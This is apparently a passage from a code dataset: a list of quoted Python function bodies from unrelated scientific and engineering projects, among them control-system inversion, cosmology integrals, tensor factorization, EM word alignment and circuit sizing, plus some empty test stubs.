for px in p]\n # 2. construct a integer whose bits are given by l\n l = sum( [lx*2**j for j, lx in enumerate(l)] )\n l = T(ve, vd, l)\n w = inverse_gc(l)\n r = gcr(w, mu, pi)\n ve = ve ^ rotate_left(e(w), vd+1)\n vd = (vd + d(w) + 1) % self._N\n h = (h << mu_norm) | r\n return h", "def eulerphi(n):\r\n\treturn euler_phi(n)", "def stbinv(A, B, C, D, y, t):\n # Description to help the user\n\n # calculate the number of samples of the output\n N = np.shape(y)[\n 1\n ] # the number of samples is the number of columns of the data matrix y\n\n # calculate system's dimensions: number of states and number of inputs\n m = B.shape[1] # number of inputs\n n = A.shape[0] # number of states\n\n # initialize the variable v (additional input)\n v = np.zeros((n, N)) # it will be important later\n\n # initializing the flag variable\n flag = 0\n # initializing the flag variable for the vrft method\n flag_vr = 0\n # initializing the counter of reduction steps done by the algorithm\n kround = 0\n\n # starting the loop of the reduction procedure\n while flag == 0:\n # run a step of the reduction order algorithm\n Ahat, Bhat, Chat, Dhat, yhat, vhat, nhat, phat, rhat = invredc(A, B, C, D, y, v)\n # increase the counter of reductions\n kround = kround + 1\n\n # preallocating the state vector of the inverse system\n xhat = np.zeros((nhat, N - kround)) # it must have N-kround samples\n # preallocating the calculated input\n uhat = np.zeros((m, N - kround))\n\n # defining the reduced time vector\n tt = t[:, 0 : N - kround]\n\n # test the conditions of invertibility\n if phat < m:\n # if this condition is true, then the algorithm has failed and it is not possible to find the inverse\n flag = 1\n flag_vr = 1\n # if this is the case, we print a message and end the execution\n # print('The inversion algorithm has failed')\n return uhat, tt, flag_vr\n else:\n if rhat == m:\n # ((rhat==m)&(rhat==phat)):\n # if this condition is true, then the algorithm is done. We can calculate the signal u\n flag = 2\n # calculating the inverse of the feedforward matrix\n # E=np.linalg.inv(Dhat)\n E = np.linalg.pinv(Dhat)\n else:\n # if none of the conditions above is true, then we need to proceed to another round of the reduction step of the algorithm\n A = Ahat\n B = Bhat\n C = Chat\n D = Dhat\n y = yhat\n v = vhat\n # after the reduction procedure is done, then the system can be inverted\n\n # calculating the dynamic matrix of the inverse system\n Ainv = Ahat - Bhat @ E @ Chat\n # eigenvalues of the inverse system's dynamic matrix\n wv, v = np.linalg.eig(Ainv) # w=eigenvalues, v=eigenvectors\n # calculating the input matrix of the inverse system\n Binv = Bhat @ E\n # calculating the output matrix of the inverse system\n Cinv = -E @ Chat\n # calculating the feedforward matrix of the inverse system\n Dinv = E\n\n # test if the inverse dynamic system is stable\n wbool = wv > 1\n wsum = np.sum(wbool)\n # test if wsum is greater than 1\n if wsum > 0:\n # if wsum is greater than 1, then, the inverse system is unstable, so we end the execution of the algorithm\n # print('The inverse system is unstable')\n flag_vr = 2\n return uhat, tt, flag_vr\n else:\n # if wsum=0, then the inverse system is stable, and we can calculate the input signal\n # calculate the first value for the output (t=0)\n uhat[:, 0] = Cinv @ xhat[:, 0] + Dinv @ yhat[:, 0]\n # calculate the states and the output of the inverse system\n for k in range(0, N - 1 - kround):\n xhat[:, k + 1] = Ainv @ xhat[:, k] + Binv @ yhat[:, k] + vhat[:, k]\n uhat[:, k + 1] = Cinv @ xhat[:, k + 1] + Dinv @ yhat[:, k + 1]\n\n return uhat, tt, flag_vr", "def N_TE_EE(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = self.F_EE(l1, l2, phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalEE(l2)\n result += self.F_EE(l2, l1, -phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalEE(l2)\n result *= self.F_TE(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TE_EE.__func__, \"integ\"):\n self.N_TE_EE.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TE_EE.integ(integrand, nitn=8, neval=1000)\n result = self.N_TE_EE.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def Phi_nu_mu1(self, E_nu, N=1e24):\n #check this \n try:\n phi = [0.]*len(E_nu)\n\n Int = lambda x: self.crossSection(x) * self.protonFlux(x) * self.F_nu_mu_1(E_nu/x, x) / x\n\n for i, E_nu in enumerate(E_nu):\n logE_min = np.log10(E_nu)\n logE_max = 10\n\n Intervals = int(np.ceil(logE_max-logE_min))\n\n IntegrationBoundary = np.logspace(logE_min, logE_max, Intervals+1)\n #print IntegrationBoundary\n\n for j in range(Intervals):\n phi[i] += 1.6*N*quad(Int, IntegrationBoundary[j], IntegrationBoundary[j+1])[0]\n\n return np.array(phi)\n\n except TypeError as e:\n phi = 0.\n\n Int = lambda x: self.crossSection(x) * self.protonFlux(x) * self.F_nu_mu_1(E_nu/x, x) / x\n\n logE_min = np.log10(E_nu)\n logE_max = 10\n\n Intervals = int(np.ceil(logE_max-logE_min))\n IntegrationBoundary = np.logspace(logE_min, logE_max, Intervals+1)\n #print IntegrationBoundary\n for i in range(Intervals):\n phi += 1.6*N*quad(Int, IntegrationBoundary[i], IntegrationBoundary[i+1])[0]\n print (phi)\n\n return phi", "def test_put_nveto_pmt_item(self):\n pass", "def solveForModeB1(X, M, n, maxInner, epsilon, tol,sita,Y1, lambta2):\n # Pi(n) = [A(N) kr A(N-1) kr ... A(n+1) kr A(n-1) kr .. A(1)]^T\n Pi = tensorTools.calculatePi(X, M, n)\n #print 'Pi size', Pi.shape\n #print 'pi='+str(Pi)\n #print(M.U[n])\n for iter in range(maxInner):\n # Phi = (X(n) elem-div (B Pi)) Pi^T\n #print X.vals.shape,X.shape\n #print X.vals.flatten().shape\n Phi = tensorTools.calculatePhi(X, M.U[n], Pi, n, epsilon=epsilon)\n #print('phi'+str(Phi))\n #print(Phi)\n # check for convergence that min(B(n), E - Phi(n)) = 0 [or close]\n kktModeViolation = np.max(np.abs(np.minimum(M.U[n], 1-Phi).flatten()))\n if (kktModeViolation < tol):\n break\n\n B=M.U[n]\n #print B.shape\n colNorm = np.apply_along_axis(np.linalg.norm, 0, B, 1)\n zeroNorm = np.where(colNorm == 0)[0]\n colNorm[zeroNorm] = 1\n B = B / colNorm[np.newaxis, :]\n tm=np.hstack((np.ones((B.shape[0],1)),B))\n Y1=Y1.reshape((Y1.shape[0],1))\n\n derive=-1.0*lambta2/B.shape[0]*np.dot((Y1-np.dot(tm,sita)),sita.T)\n #print derive.shape\n #print np.multiply(M.U[n],derive[:,1:]).shape\n #print np.multiply(M.U[n],Phi).shape\n M.U[n] = np.array(np.multiply(M.U[n],Phi))-np.array((np.multiply(M.U[n],derive[:,1:])))\n\n #print 'after'\n #print M.U[n][0]\n #print(\" Mode={0}, Inner Iter={1}, KKT violation={2}\".format(n, iter, kktModeViolation))\n return M, Phi, iter, kktModeViolation", "def binary_dec(A,n_iter = 1000):\n\n\t### Initialization ###\n\n\tp, q = np.shape(A)\n\t### B : to be changed\n\tB = np.eye(p)\n \t###\n\tC = bin_random_mat(p,q)\n\tlist_dist = []\n\tB_argmin = B\n\tC_argmin = C\n\n\n\n\n\t## temperature ##\n\tT_n = np.log(np.arange(2,n_iter+2,1))\n\t#T_n = np.arange(2,n_iter+2,1)\n\tfor i in range(n_iter):\n\t## update ##\n\t\tC_0 = np.matrix(C)\n\t\tlist_dist =np.append( list_dist, V_potential(np.dot(B,C_0),A) )\n\t\tif V_potential(np.dot(B_argmin,C_argmin),A) == 0:\n\t\t\tbreak\n\t########## transition #############\n\t# Here we take 2 steps independent(for B and for C respectively)\n\t# We could also use metropolis hasting kernel.\n\n\t\tC_iter = np.matrix(Metropolis_transition_C(C))\n\t\n\n\t\tB_iter = B[np.random.permutation(np.arange(p))]\n\t\t\n\t\tif np.random.uniform(0,1,1) < \\\n\t\t\t\tnp.exp(-1./T_n[i]*( V_potential(np.dot(B_iter,C_iter), A)\\\n\t\t\t\t - V_potential(np.dot(B,C_0),A) ) ):\n\t\t\tC = C_iter\n\t\t\tB = B_iter\n\t######### end of transition ##############\n\n\t\t\tif V_potential(np.dot(B,C),A) < np.min(list_dist):\n\t\t\t\t\n\t\t\t\tB_argmin = B\n\t\t\t\tC_argmin = np.matrix(C)\n\t\t\t# print i+1\n\t\t\t# print V_potential(np.dot(B_argmin,C_argmin),A)\n\t\t\t# print C_argmin\n\t\t\t# print '\\n'\n\n\treturn list_dist,B_argmin, C_argmin", "def exercise_b2_106():\r\n pass", "def test_superposition_ud_cnot():\n program = dedent(\n \"\"\"\\\n register q0[0]\n register q1[1]\n H q1\n CNOT q1 q0\n \"\"\"\n )\n\n result = run(program, run_gate_array, return_distribution=True)\n assert isclose(result, [0.5, 0.0, 0.0, 0.5]).all()", "def exercise_b2_70():\r\n pass", "def comp_vext_tem_pyth(self, ao_log=None, numba_parallel=True):\n\n def c2r_lm(conv, clm, clmm, m):\n \"\"\"\n clm: sph harmonic l and m\n clmm: sph harmonic l and -m\n convert from real to complex spherical harmonic\n for an unique value of l and m\n \"\"\"\n rlm = 0.0\n if m == 0:\n rlm = conv._c2r[conv._j, conv._j]*clm\n else:\n rlm = conv._c2r[m+conv._j, m+conv._j]*clm +\\\n conv._c2r[m+conv._j, -m+conv._j]*clmm\n\n if rlm.imag > 1e-10:\n print(rlm)\n raise ValueError(\"Non nul imaginary paert for c2r conversion\")\n return rlm.real\n\n def get_index_lm(l, m):\n \"\"\"\n return the index of an array ordered as \n [l=0 m=0, l=1 m=-1, l=1 m=0, l=1 m=1, ....]\n \"\"\"\n return (l+1)**2 -1 -l + m\n\n warnings.warn(\"Obselete routine use comp_vext_tem\")\n\n if use_numba:\n get_time_potential = nb.jit(nopython=True, parallel=numba_parallel)(get_tem_potential_numba)\n V_time = np.zeros((self.time.size), dtype=np.complex64)\n\n aome = ao_matelem_c(self.ao_log.rr, self.ao_log.pp)\n me = ao_matelem_c(self.ao_log) if ao_log is None else aome.init_one_set(ao_log)\n atom2s = np.zeros((self.natm+1), dtype=np.int64)\n for atom,sp in enumerate(self.atom2sp): \n atom2s[atom+1]= atom2s[atom] + me.ao1.sp2norbs[sp]\n\n R0 = self.vnorm*self.time[0]*self.vdir + self.beam_offset\n rr = self.ao_log.rr\n dr = (np.log(rr[-1])-np.log(rr[0]))/(rr.size-1)\n dt = self.time[1]-self.time[0]\n dw = self.freq_symm[1] - self.freq_symm[0]\n wmin = self.freq_symm[0]\n tmin = self.time[0]\n nff = self.freq.size\n ub = self.freq_symm.size//2 - 1\n l2m = [] # list storing m value to corresponding l\n fact_fft = np.exp(-1.0j*self.freq_symm[ub:ub+nff]*tmin)\n pre_fact = dt*np.exp(-1.0j*wmin*(self.time-tmin))\n\n for l in range(me.jmx+1):\n lm = []\n for m in range(-l, l+1):\n lm.append(m)\n l2m.append(np.array(lm))\n\n for atm, sp in enumerate(self.atom2sp):\n rcut = self.ao_log.sp2rcut[sp]\n center = self.atom2coord[atm, :]\n rmax = find_nearrest_index(rr, rcut)\n\n si = atom2s[atm]\n fi = atom2s[atm+1]\n\n for mu, l in enumerate(self.pb.prod_log.sp_mu2j[sp]):\n s = self.pb.prod_log.sp_mu2s[sp][mu]\n f = self.pb.prod_log.sp_mu2s[sp][mu+1]\n\n fr_val = self.pb.prod_log.psi_log[sp][mu, :]\n inte1 = np.sum(fr_val[0:rmax+1]*rr[0:rmax+1]**(l+2)*rr[0:rmax+1]*dr)\n\n for k in range(s, f):\n V_time.fill(0.0)\n\n m = l2m[l][k-s]\n ind_lm = get_index_lm(l, m)\n ind_lmm = get_index_lm(l, -m)\n\n if use_numba:\n get_time_potential(self.time, R0, self.vnorm, self.vdir, center, rcut, inte1,\n rr, dr, fr_val, me._c2r, l, m, me._j, ind_lm, ind_lmm, V_time)\n else:\n for it, t in enumerate(self.time):\n R_sub = R0 + self.vnorm*self.vdir*(t - self.time[0]) - center\n norm = np.sqrt(np.dot(R_sub, R_sub))\n\n if norm > rcut:\n I1 = inte1/(norm**(l+1))\n I2 = 0.0\n else:\n rsub_max = find_nearrest_index(rr, norm)\n\n I1 = np.sum(fr_val[0:rsub_max+1]*\n rr[0:rsub_max+1]**(l+2)*rr[0:rsub_max+1])\n I2 = np.sum(fr_val[rsub_max+1:]*\n rr[rsub_max+1:]/(rr[rsub_max+1:]**(l-1)))\n\n I1 = I1*dr/(norm**(l+1))\n I2 = I2*(norm**l)*dr\n clm_tem = csphar(R_sub, l)\n clm = (4*np.pi/(2*l+1))*clm_tem[ind_lm]*(I1 + I2)\n clmm = (4*np.pi/(2*l+1))*clm_tem[ind_lmm]*(I1 + I2)\n rlm = c2r_lm(me, clm, clmm, m)\n V_time[it] = rlm + 0.0j\n \n V_time *= pre_fact\n \n\n FT = fft(V_time)\n\n self.V_freq[:, si + k] = FT[ub:ub+nff]*fact_fft", "def eval(self, sample):\n '''\n jv = sample.get(JOINT_VELOCITIES)\n eepv = sample.get(END_EFFECTOR_POINT_VELOCITIES)\n\n boxpos = jv[:, 2:5]\n fingerpos = eepv[:, 7:10]\n tgtpos = np.zeros((100,3))\n for i in range(100):\n tgtpos[i] = [0.6, 0.2, 0.1]\n \n fetchdist = np.sum((boxpos - fingerpos) ** 2, axis=1)\n liftdist = np.sum((boxpos - tgtpos) ** 2, axis=1)\n \n l = fetchdist + liftdist\n '''\n\n eept = sample.get(END_EFFECTOR_POINTS)\n eepv = sample.get(END_EFFECTOR_POINT_VELOCITIES)\n sample_u = sample.get_U()\n cfrc_ext = np.concatenate((eept[:, 13:56], eepv[:, 0:41]), axis = 1)\n # vec = eepv[:, 64:66] \n # dist = np.sum(np.square(vec), axis=1) / 5\n forward_reward = eepv[:, 53]\n scaling = 150\n ctrl_cost = 0.5 * 1e-2 * np.sum(np.square(sample_u / scaling), axis = 1)\n # contact_cost = 0.5 * 1e-3 * np.sum(np.square(cfrc_ext), axis = 1)\n # survive_reward = 0.5\n \n l = -forward_reward + ctrl_cost\n\n prefix=''\n logger.record_tabular('PolReturn', -sum(l))\n\n ave_vel = np.mean(forward_reward)\n min_vel = np.min(forward_reward)\n max_vel = np.max(forward_reward)\n std_vel = np.std(forward_reward)\n logger.record_tabular(prefix+'PolAverageVelocity', ave_vel)\n logger.record_tabular(prefix+'PolMinVelocity', min_vel)\n logger.record_tabular(prefix+'PolMaxVelocity', max_vel)\n logger.record_tabular(prefix+'PolStdVelocity', std_vel)\n logger.dump_tabular(with_prefix=False)\n \n lx, lu, lxx, luu, lux = 0, 0, 0, 0, 0\n\n '''\n # Compute weighted sum of each cost value and derivatives.\n weight = self._weights[0]\n l = l * weight\n lx = lx * weight\n lu = lu * weight\n lxx = lxx * weight\n luu = luu * weight\n lux = lux * weight\n for i in range(1, len(self._costs)):\n pl, plx, plu, plxx, pluu, plux = self._costs[i].eval(sample)\n weight = self._weights[i]\n l = l + pl * weight\n lx = lx + plx * weight\n lu = lu + plu * weight\n lxx = lxx + plxx * weight\n luu = luu + pluu * weight\n lux = lux + plux * weight\n '''\n \n return l, lx, lu, lxx, luu, lux", "def eulerphi(n):\n\treturn euler_phi(n)", "def test_get_nveto_pmt_item(self):\n pass", "async def _design_lvl_shift_internal_inv(self, pseg: int, nseg: int, out_inv_m: int,\n fanout: float,\n pinfo: Any, tbm_specs: Dict[str, Any], is_ctrl: bool,\n has_rst: bool, dual_output: bool,\n vin: str, vout: str) -> Tuple[int, int]:\n if is_ctrl: # size with fanout\n inv_nseg = int(np.round(nseg / fanout))\n inv_nseg = 1 if inv_nseg == 0 else inv_nseg\n inv_pseg = int(np.round(pseg / fanout))\n inv_pseg = 1 if inv_pseg == 0 else inv_pseg\n self.log(f\"Calculated inv to need nseg : {inv_nseg}\")\n self.log(f\"Calculated inv to need pseg : {inv_pseg}\")\n return inv_pseg, inv_nseg\n\n # First size the NMOS in the inverter assuming a reasonably sized PMOS\n inv_nseg = await self._design_lvl_shift_inv_pdn(pseg, nseg, out_inv_m, fanout, pinfo,\n tbm_specs, has_rst, dual_output, vin, vout)\n self.log(f\"Calculated inv to need at least nseg: {inv_nseg}\")\n\n # Now using the inverter pull down size, we size the inverter pull up PMOS\n inv_pseg, inv_nseg = await self._design_lvl_shift_inv_pun(pseg, nseg, inv_nseg, out_inv_m,\n fanout, pinfo,\n tbm_specs, has_rst, dual_output,\n vin, vout)\n self.log(f\"Calculated inv to need pseg: {inv_pseg} and nseg: {inv_nseg}\")\n return inv_pseg, inv_nseg", "def test_active_inference_SPM_1b(self):", "def ec_matrix_vector(p0, T, n): \n if(n<=0):\n EC=np.zeros(T.shape)\n return EC\n else:\n \"\"\"Probability vector after (k=0) propagations\"\"\" \n p_k=1.0*p0\n \"\"\"Sum of vectors after (k=0) propagations\"\"\"\n p_sum=1.0*p_k \n for k in xrange(n-1):\n \"\"\"Propagate one step p_{k} -> p_{k+1}\"\"\"\n p_k=np.dot(p_k,T) \n \"\"\"Update sum\"\"\"\n p_sum+=p_k \n \"\"\"Expected counts\"\"\"\n EC=p_sum[:,np.newaxis]*T \n return EC", "def em_step(t, eng, fre):\n # TODO\n # Lecture Steps:\n # 1. Make a table of P(f|e) for all possible pairs of f and e, prob_tab\n # 2. Make a grid where each sentence pair is a row and each possible\n # alignment is a column\n # 3. For each sentence pair and alignment compute P(F|a,E)\n # Given aligned words f1,f2,...,fn and e1,e2,...,en in the pair:\n # P(F|a,E) = prob_tab[f1][e1] * ... * prob_tab[fn][en]\n # 4. For each sentence pair and alignment\n # divide P(F|a,E) by the sum of the P(F|a,E)'s in the row\n # this is P(a|E,F)\n # 5. For each possible word pair e and f, sum P(a|E,F) across all\n # alignments and sentence pairs for each instance that e is aligned\n # with f, this gets out a TCount table\n # 6. Sum over the rows of TCount to get the total estimates for each\n # english word e.\n # 7. Compute P(f|e) = TCount[f][e] / Total[e]\n # This is the model after 1 iteration.\n\n '''\n Tutorial Steps:\n initialize P(f|e)\n for a number of iterations:\n set tcount(f, e) to 0 for all f, e\n set total(e) to 0 for all e\n for each sentence pair (F, E) in training corpus:\n for each unique word f in F:\n denom_c = 0\n for each unique word e in E:\n denom_c += P(f|e) * F.count(f)\n for each unique word e in E:\n tcount(f, e) += P(f|e) * F.count(f) * E.count(e) / denom_c\n total(e) += P(f|e) * F.count(f) * E.count(e) / denom_c\n for each e in domain(total(:)):\n for each f in domain(tcount(:,e)):\n P(f|e) = tcount(f, e) / total(e)\n '''\n\n '''\n My Pseudocode:\n The Table of P(f|e) is already initiated as the AM dictionary.\n Presumably the AM is passed in as t.\n Initialize TCount as a dictionary like AM, e.g. TCount[e][f] = 0\n Initialize Total as a dictionary with the same entries as TCount[e] = 0\n for i in range(0,len(eng)):\n\n '''\n AM = dict.fromkeys(t.keys(), 0)\n Total = dict.fromkeys(t.keys(), 0)\n TCount = dict.fromkeys(t.keys(), 0)\n for key in TCount.keys():\n TCount[key] = dict.fromkeys(t[key].keys(), 0)\n AM[key] = dict.fromkeys(t[key].keys(), 0)\n\n num_sentences = min(len(eng), len(fre))\n for i in range(0, num_sentences):\n E = eng[i]\n F = fre[i]\n E_uniques = list(set(E))\n F_uniques = list(set(F))\n for f in F_uniques:\n denom_c = 0\n for e in E_uniques:\n denom_c += t[e][f] * F.count(f)\n for e in E_uniques:\n TCount[e][f] += t[e][f] * F.count(f) * E.count(e) / denom_c\n Total[e] += t[e][f] * F.count(f) * E.count(e) / denom_c\n for e in Total.keys():\n for f in TCount[e].keys():\n AM[e][f] = TCount[e][f] / Total[e]\n\n return AM", "def p(e, t):\n return b * e ** 2", "def evaltr(x_solution): \n \n large = 10.0**30\n pred = np.zeros(cfg.ntrain)\n e0 = 0.0 # mean of observed values\n y=0.0\n for i in range(cfg.ntrain): # Computation of correct piece\n e0 += cfg.a_unscaled[i][-1]\n pind = 0\n ipbest = 0\n pbest = -large # for max\n \n for j1 in range(cfg.nomax):\n ipmin=pind\n pmin=large # for min\n for _ in range(cfg.jk[j1]):\n piece=x_solution[(pind+1)*cfg.nfea-1] \n for j3 in range(cfg.nfea-1): #\n piece += x_solution[pind*cfg.nfea+j3]*cfg.a_unscaled[i][j3]\n if piece < pmin:\n ipmin = pind\n pmin = piece\n pind += 1 \n \n if pmin > pbest:\n ipbest = ipmin\n pbest = pmin\n \n pred[i] = x_solution[(ipbest+1)*cfg.nfea-1] # Computation of prediction\n for j1 in range(cfg.nfea-1):\n pred[i] += x_solution[ipbest*cfg.nfea+j1]*cfg.a_unscaled[i][j1]\n y += pred[i]\n \n y = y/cfg.ntrain \n e0 = e0/cfg.ntrain\n \n # Computation of indices\n rmse = 0.0\n mae = 0.0\n e1 = 0.0\n for i in range(cfg.ntrain):\n rmse += (pred[i]-cfg.a_unscaled[i][-1])**2\n mae += np.abs(pred[i]-cfg.a_unscaled[i][-1]) \n e1 += (cfg.a_unscaled[i][-1] - e0)**2\n ce = 1.0 - rmse/e1 \n rmse = np.sqrt(rmse/cfg.ntrain)\n mae = mae/cfg.ntrain \n\n if cfg.ntrain > 1:\n sx=0.0\n sy=0.0\n rcor=0.0\n for i in range(cfg.ntrain):\n sx += (pred[i]-y)**2\n sy += (cfg.a_unscaled[i][-1]-e0)**2 \n rcor += (pred[i]-y) * (cfg.a_unscaled[i][-1]-e0) \n\n r = rcor/np.sqrt(sx*sy)\n \n return rmse,mae,ce,r", "def exercise_b2_93():\r\n pass", "def fig16():\n # fmt: off\n tpm = np.array([\n [0, 0, 0, 0, 0, 0, 0],\n [0, 0, 1, 0, 1, 0, 0],\n [1, 0, 1, 0, 0, 0, 0],\n [1, 0, 0, 0, 1, 0, 0],\n [1, 0, 0, 0, 0, 0, 0],\n [1, 0, 1, 0, 1, 0, 0],\n [1, 0, 1, 0, 0, 0, 0],\n [1, 0, 0, 0, 1, 0, 0],\n [0, 0, 0, 1, 1, 0, 0],\n [0, 0, 1, 1, 1, 0, 0],\n [1, 0, 1, 1, 1, 0, 0],\n [1, 0, 0, 1, 1, 0, 0],\n [1, 0, 0, 1, 1, 0, 0],\n [1, 1, 1, 1, 1, 0, 0],\n [1, 0, 1, 1, 1, 0, 0],\n [1, 1, 0, 1, 1, 0, 0],\n [0, 0, 0, 1, 1, 0, 0],\n [0, 0, 1, 1, 1, 0, 0],\n [1, 0, 1, 1, 1, 0, 0],\n [1, 0, 0, 1, 1, 0, 0],\n [1, 0, 0, 1, 1, 0, 0],\n [1, 0, 1, 1, 1, 0, 0],\n [1, 0, 1, 1, 1, 0, 0],\n [1, 0, 0, 1, 1, 0, 0],\n [0, 0, 0, 1, 1, 0, 0],\n [0, 0, 1, 1, 1, 0, 0],\n [1, 0, 1, 1, 1, 0, 0],\n [1, 0, 0, 1, 1, 0, 0],\n [1, 0, 0, 1, 1, 0, 0],\n [1, 1, 1, 1, 1, 0, 0],\n [1, 0, 1, 1, 1, 0, 0],\n [1, 1, 0, 1, 1, 0, 0],\n [0, 0, 0, 0, 0, 1, 0],\n [0, 0, 1, 0, 1, 1, 0],\n [1, 0, 1, 0, 0, 1, 0],\n [1, 0, 0, 0, 1, 1, 0],\n [1, 0, 0, 0, 0, 1, 0],\n [1, 0, 1, 0, 1, 1, 0],\n [1, 0, 1, 0, 0, 1, 0],\n [1, 0, 0, 0, 1, 1, 0],\n [0, 0, 0, 1, 1, 1, 0],\n [0, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 1, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 1, 0, 1, 1, 1, 0],\n [0, 0, 0, 1, 1, 1, 0],\n [0, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [0, 0, 0, 1, 1, 1, 0],\n [0, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 1, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 1, 0, 1, 1, 1, 0],\n [0, 0, 0, 0, 0, 1, 0],\n [0, 0, 1, 0, 1, 1, 0],\n [1, 0, 1, 0, 0, 1, 0],\n [1, 0, 0, 0, 1, 1, 0],\n [1, 0, 0, 0, 0, 1, 0],\n [1, 0, 1, 0, 1, 1, 0],\n [1, 0, 1, 0, 0, 1, 0],\n [1, 0, 0, 0, 1, 1, 0],\n [0, 0, 0, 1, 1, 1, 0],\n [0, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 1, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 1, 0, 1, 1, 1, 0],\n [0, 0, 0, 1, 1, 1, 0],\n [0, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [0, 0, 0, 1, 1, 1, 0],\n [0, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 1, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 1, 0, 1, 1, 1, 0],\n [0, 0, 0, 0, 0, 1, 1],\n [0, 0, 1, 0, 1, 1, 1],\n [1, 0, 1, 0, 0, 1, 1],\n [1, 0, 0, 0, 1, 1, 1],\n [1, 0, 0, 0, 0, 1, 1],\n [1, 0, 1, 0, 1, 1, 1],\n [1, 0, 1, 0, 0, 1, 1],\n [1, 0, 0, 0, 1, 1, 1],\n [0, 0, 0, 1, 1, 1, 1],\n [0, 0, 1, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1, 1],\n [1, 1, 1, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1, 1],\n [1, 1, 0, 1, 1, 1, 1],\n [0, 0, 0, 1, 1, 1, 1],\n [0, 0, 1, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1, 1],\n [0, 0, 0, 1, 1, 1, 1],\n [0, 0, 1, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1, 1],\n [1, 1, 1, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1, 1],\n [1, 1, 0, 1, 1, 1, 1],\n ])\n cm = np.array([\n [0, 1, 1, 0, 1, 0, 0],\n [1, 0, 1, 0, 0, 0, 0],\n [1, 1, 0, 0, 0, 0, 0],\n [0, 1, 0, 1, 1, 0, 0],\n [0, 0, 0, 1, 1, 0, 0],\n [0, 0, 0, 0, 0, 1, 1],\n [0, 0, 0, 0, 0, 1, 1],\n ])\n # fmt: on\n return Network(tpm, cm=cm, node_labels=LABELS[:tpm.shape[1]])", "async def _design_lvl_shift_inv_pun(self, pseg: int, nseg: int, inv_nseg: int, out_inv_m: int,\n fanout: float,\n pinfo: Any, tbm_specs: Dict[str, Any], has_rst, dual_output,\n vin, vout) -> Tuple[int, int]:\n inv_beta = get_tech_global_info('bag3_digital')['inv_beta']\n tb_params = self._get_full_tb_params()\n # Use a binary iterator to find the PMOS size\n load_seg = nseg + (pseg if has_rst else 0)\n inv_pseg_nom = int(np.round(inv_beta * load_seg / ((1 + inv_beta) * fanout)))\n inv_pseg_nom = 1 if inv_pseg_nom == 0 else inv_pseg_nom\n iterator = BinaryIterator(-inv_pseg_nom + 1, 0)\n err_best = float('inf')\n inv_in_nseg, inv_in_pseg = self._size_input_inv_for_fanout(inv_pseg_nom, inv_nseg, pseg,\n nseg, fanout, has_rst)\n all_corners = get_tech_global_info('bag3_digital')['signoff_envs']['all_corners']\n\n while iterator.has_next():\n pseg_off = iterator.get_next()\n inv_pseg = inv_pseg_nom + pseg_off\n dut_params = self._get_lvl_shift_params_dict(pinfo, pseg, nseg, inv_pseg, inv_nseg,\n inv_in_nseg, inv_in_pseg, out_inv_m,\n has_rst, dual_output)\n dut = await self.async_new_dut('lvshift', STDCellWrapper, dut_params)\n\n err_worst = -1 * float('Inf')\n for env in all_corners['envs']:\n tbm_specs['sim_envs'] = [env]\n tbm_specs['sim_params']['vdd_in'] = all_corners[vin][env]\n tbm_specs['sim_params']['vdd'] = all_corners[vout][env]\n tbm = cast(CombLogicTimingTB, self.make_tbm(CombLogicTimingTB, tbm_specs))\n sim_results = await self.async_simulate_tbm_obj(f'sim_inv_pseg_{inv_pseg}_{env}',\n dut, tbm, tb_params)\n tdr_cur, tdf_cur = CombLogicTimingTB.get_output_delay(sim_results.data, tbm.specs,\n 'in',\n 'out', False, in_pwr='vdd_in',\n out_pwr='vdd')\n\n '''\n plt.figure()\n 